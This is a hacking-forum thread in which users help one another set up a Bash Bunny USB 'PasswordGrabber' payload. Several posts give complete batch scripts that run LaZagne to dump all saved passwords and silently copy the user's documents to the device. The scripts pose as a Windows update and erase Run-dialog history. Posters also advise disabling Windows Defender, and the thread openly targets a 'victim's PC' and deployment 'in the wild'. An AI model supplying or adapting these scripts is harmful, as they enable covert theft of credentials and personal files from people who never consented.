Jump to content
Cech

Need help with PasswordGrabber

Recommended Posts

Hey guys,

 

My Bash Bunny just arrived! But there is one problem, I've tried some payloads and all of them worked fine, but I had a problem with PasswordGrabber. There are a few codes in different documents so if anyone could tell me how to set it up on BashBunny?

 

https://github.com/hak5/bashbunny-payloads/pull/67

 

This is the script, but I don't really get it how to place it on BashBunny. Thank  you in advance!

Share this post


Link to post
Share on other sites

1) If you have not yet, update bunny and if so then ignore this.  This is just the common first answer you will get and has been the answer to many questions.

2) This payload needs an external project added, the Lazagne project, the compile version for Windows and it has to be in the switch folder with the payload.txt.

 

The compiled version is on the site too or you can follow the directions for the project for Lazagne to do your own compiling. 

Share this post


Link to post
Share on other sites

I did everything, but nothing seem to work :/

(d.exe, e.exe, i.vbs, lazagne.exe, lazagne.py, payload.txt and readme.md) These are the files added to the switch folder but once I plug it in I get empty directories and also my firmware is 1.4 

 

Share this post


Link to post
Share on other sites

Hello RazerBlade, first of all thank you for your answer. But, since I'm a bit new to this, would you please explain me which files where it goes? Which file should go in the switch and which file to go somewhere else?

 

It's probably easier to understand for you professionals but not for regular people like me :) 

Share this post


Link to post
Share on other sites

I don't remember the e and d files being exes.  They were cmd files.

 

Try this.  If you got the lazagne.exe then copy it to the machine and run it.  According to the command file the command below should display output to the screen.

lazagne.exe all -v

If you get something then we know lazagne works.  Next with the bashbunny in arming mode run the command again but add in " > driveletterofBB:\loot\lazagnetest.txt" where driveletterofBB is the current drive letter of BashBunny.  We are just testing here to make sure everything works piece by piece.  

Share this post


Link to post
Share on other sites

Whenever I open lasagne.exe (directly or through cmd) I get the following error and closes the program within a second. 

lazaGne.exe: error: too few arguments

Share this post


Link to post
Share on other sites

in the explorer window shift+right click open powershell/cmd at location then 

./laZange.exe all -v

shouuld do it :wink:

Share this post


Link to post
Share on other sites

Ok it works, it found all my passwords, but how do I place it in switch2 so when I place the BashBuny, into victim's PC the script to start attacking and to save all the passwords in loot folder instead of making an empty directories?

Edited by Cech

Share this post


Link to post
Share on other sites

The *'s are 'wildcards' you can replace them with desired target names or change the file extension (.doc) to any desired. :grin:

Share this post


Link to post
Share on other sites

Could be windows defender blocking LaZange from working, was the only thing I found that would give me an empty password.txt if it was active during scan. It also auto deletes hack tools or quarantines them automatically when active so I always shut it off before arming my bunny.

Share this post


Link to post
Share on other sites

Do I need to configure something in these files or I just need ti place them in the "Switch2" directory along with laZagne.exe file?

 

If there is any configuration required to the following files, can you please help me out to sort these things out? 

d.cmd

e.cmd

i.vbs

payload.txt

readme.md

Share this post


Link to post
Share on other sites

Configure the xcopy command in e.cmd to whatever your trying to grab, I also found if I have set up internet share with the bunny it won’t dump files but it still grabs passwords with lazange. If you have sharing turned on in your main network card turn it off when testing the payload. ? lazange.exe/I.vbs/e.cmd/d.cmd/payload.txt should all be in the same switch (1/2) folded so they can be used together.

*Also use notepad++ not notepad cause it works better ?

Edited by D31M0Z

Share this post


Link to post
Share on other sites

#the link you provided doesnt work since its a local file not an internet file lol but here is my e.cmd for txt files

@echo off
@echo Installing Windows Update
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
setlocal

#Below uses the laZange.exe in your switch folder

cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"

#Below runs xcopy to grab file specified by location and file extension (the one below grabs simple .txt documents

#Try making a txt document on your desktop labeled target.txt then run the payload to see if it grabs it.

set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.txt %dst% >>nul)

#the line below spams caps lock to tell you that the payload is done and files are coppied (if you have a caps lock led on your keyboard it should blink when the payload finishes.)

start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit


 

Edited by D31M0Z

Share this post


Link to post
Share on other sites

First I had to do a little changes because I had an error in the previous saying that  "gwin" does not exist (or something like that) so I've added the following code 

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious

The script ran smoothly, but then the powershell window appeared and closed. Thought everything was perfect before I went at the last step at opening the loot directory. The loot directory is empty again..

Share this post


Link to post
Share on other sites

the only line i change when comeing frrom a fresh payload copy is:

the *'s are wildcards so the xcopy will search any directories or names in the

user profile containing txt files.

the /C /Q /G /Y are explained below the xcopy command /S makes sure it doesnt grab empty folders

if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.doc %dst% >>nul
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul

REM Same as above but does not create empty directories
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul

)
 

 

Share this post


Link to post
Share on other sites
4 minutes ago, Cech said:

First I had to do a little changes because I had an error in the previous saying that  "gwin" does not exist (or something like that) so I've added the following code 

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious

The script ran smoothly, but then the powershell window appeared and closed. Thought everything was perfect before I went at the last step at opening the loot directory. The loot directory is empty again..

the powershell opening then closing is the first line, everythiing else needs to load so dont prematurely pull the bunny.

wait for that caps lock to blink for the okay from the bunny itself.

the loot folder should contain a directory labeled with the victim then a txt file containing the lazange scan 

for example if i were to deploy this in the wild i would make sure it can be inserted and left for at least 5-10 min.

to make sure the xcopy command finishes and exits so i don't miss anything.

doesnt need to be 5-10 min. (only needs to hit the last line where it flashes caps lock)

but it gives me a time frame to wait on then come back to it and pull.

Edited by D31M0Z

Share this post


Link to post
Share on other sites

This is kind a strange..I've copied all your files and when I plugged in the USB I've got the notepad with all the usernames and passwords, so I was like...wow let's try it out again, the second time when I put the USB (was waiting for the caps lock to finish blinking) then I get again empty directories...

 

I was like, let's try once more maybe I did something wrong, I placed the USB inside my computer and again, empty directories..

Share this post


Link to post
Share on other sites

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious

REM This executes LaZagne in the current directory and outputs the password file to Loot
REM Time and Date is also added
setlocal
cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"

REM These lines if you just want Passwords and no files.
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.txt %dst% >>nul
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul

REM Same as above but does not create empty directories
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul

)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit
 

Share this post


Link to post
Share on other sites

Above is a direct copy of my e.cmd,  e.cmd is the only file i ever edit on this payload.

**try running it and before pulling the bash bunny try to 'eject' it from windows, 

if windows gives you an error message saying its busy then xcopy is still running so you need to wait**

**BB is fast but you still need to give it time for some payloads, especially exfiltration payloads**

**just think about how long it takes you to move pictures or docs into a normal flash drive,

the BB does have a  great transfer rate though lol**

Edited by D31M0Z

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...